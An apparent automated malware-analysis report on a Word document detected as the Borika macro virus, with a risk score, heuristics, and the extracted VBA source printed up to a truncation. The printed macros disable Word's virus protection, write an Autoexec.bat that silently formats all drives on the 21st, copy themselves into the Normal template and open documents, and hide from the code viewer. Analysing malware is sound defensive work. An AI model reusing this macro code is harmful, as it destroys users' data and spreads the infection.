MALICIOUS
288
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros with AutoOpen and AutoClose functions, indicative of malicious intent. The AutoOpen macro, when the day of the month is the 21st, creates a batch file named C:\Autoexec.bat. This batch file contains commands to format all local drives (C: through K:), effectively acting as a destructive payload. The ClamAV detection 'Doc.Trojan.Borika-1' further supports the malicious nature of this document.
Heuristics 7
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 36,352 bytes but its declared streams total only 16,490 bytes — 19,862 bytes (55%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6134 bytes |
SHA-256: 0950ac028594108f4cf598deaadb86e18cfcd77d19747089e1a956faa4d73ebe |
|||
|
Detection
ClamAV:
Doc.Trojan.Borika-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Borika"
Sub AutoOpen()
'MyName = Borika.Macro_Format
'WrittenBy = Borika from Kz (Ust-Kamenogorsk)
'Version = 1.0
Options.VirusProtection = False
Options.ConfirmConversions = False
Options.SaveNormalPrompt = False
If ShowVisualBasicEditor Then Application.Quit True
Call WeTrustInGod
End Sub
Sub WeTrustInGod()
On Error Resume Next
Bat = "C:\Autoexec.bat"
If Day(Date) = 21 Then
SetAttr Dat, vbNormal
Kill Bat
Open Bat For Output As #2
Print #2, "@echo off"
For I = 99 To 122
Print #2, "format " & Chr(I) & ": /autotest /q > nul"
Next I
Print #2, "format a: /autotest /q > nul"
Print #2, "format b: /autotest /q > nul"
Print #2, "cls"
For I = 0 To 9
Print #2, "echo."
Next I
Print #2, "echo Borika.Macro_Format Virus"
Close #2
End If
End Sub
Sub AutoClose()
On Error Resume Next
windir = Environ("windir")
Options.VirusProtection = False
Options.ConfirmConversions = False
Options.SaveNormalPrompt = False
Call Exp
If NormalTemplate.VBProject.VBComponents.Item("Borika").CodeModule.Lines(2, 1) <> "'MyName = Borika.Macro_Format" Then
NormalTemplate.VBProject.VBComponents.Import (windir & "\~$ad.dll")
NormalTemplate.Save
End If
If ActiveDocument.VBProject.VBComponents.Item("Borika").CodeModule.Lines(2, 1) <> "'MyName = Borika.Macro_Format" Then
ActiveDocument.VBProject.VBComponents.Import (windir & "\~$ad.dll")
ActiveDocument.SaveAs ActiveDocument.FullName
End If
End Sub
Sub ToolsMacro()
On Error Resume Next
windir = Environ("windir")
Call Hide
For X = 1 To NormalTemplate.VBProject.VBComponents("Borika").CodeModule.CountOfLines - 1
CodeNT = CodeNT & NormalTemplate.VBProject.VBComponents("Borika").CodeModule.Lines(X, 1) & Chr(13)
Next X
NormalTemplate.VBProject.VBComponents("Borika").CodeModule.DeleteLines 1, NormalTemplate.VBProject.VBComponents("Borika").CodeModule.CountOfLines
NormalTemplate.Saved = True
If Documents.Count >= 1 Then
For Y = 1 To ActiveDocument.VBProject.VBComponents("Borika").CodeModule.CountOfLines - 1
CodeAD = CodeAD & ActiveDocument.VBProject.VBComponents("Borika").CodeModule.Lines(Y, 1) & Chr(13)
Next Y
For X = 1 To Documents.Count
Documents(X).VBProject.VBComponents("Borika").CodeModule.DeleteLines 1, Documents(X).VBProject.VBComponents("Borika").CodeModule.CountOfLines
Documents(X).Saved = True
Next X
End If
Dialogs(wdDialogToolsMacro).Show
If Not ShowVisualBasicEditor Then
NormalTemplate.VBProject.VBComponents("Borika").CodeModule.InsertLines 1, CodeNT
NormalTemplate.Save
If NormalTemplate.VBProject.VBComponents.Item("Borika").CodeModule.Lines(2, 1) <> "'MyName = Borika.Macro_Format" Then
NormalTemplate.VBProject.VBComponents.Import (windir & "\~$ad.dll")
NormalTemplate.Save
End If
If Documents.Count >= 1 Then
For X = 1 To Documents.Count
Documents(X).VBProject.VBComponents("Borika").CodeModule.InsertLines 1, CodeAD
Documents(X).SaveAs Documents(X).FullName
If Documents(X).VBProject.VBComponents.Item("Borika").CodeModule.Lines(2, 1) <> "'MyName = Borika.Macro_Format" Then
Documents(X).VBProject.VBComponents.Import (windir & "\~$ad.dll")
Documents(X).SaveAs Documents(X).FullName
End If
Next X
End If
End If
End Sub
Sub ViewVBCode()
On Error Resume Next
Call Hide
NormalTemplate.VBProject.VBComponents("Borika").CodeModule.DeleteLines 1, NormalTemplate.VBProject.VBComponents("Borika").CodeModule.CountOfLines
NormalTemplate.Saved = True
NormalTemplate.VBProject.VBComponents.Remove NormalTemplate.VBProject.VBComponents("Borika")
NormalTemplate.Saved = True
If Application.Documents.Count >= 1 Then
For X = 1 To Application.Documents.Count
Documents(X).VBProject.VBComp
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.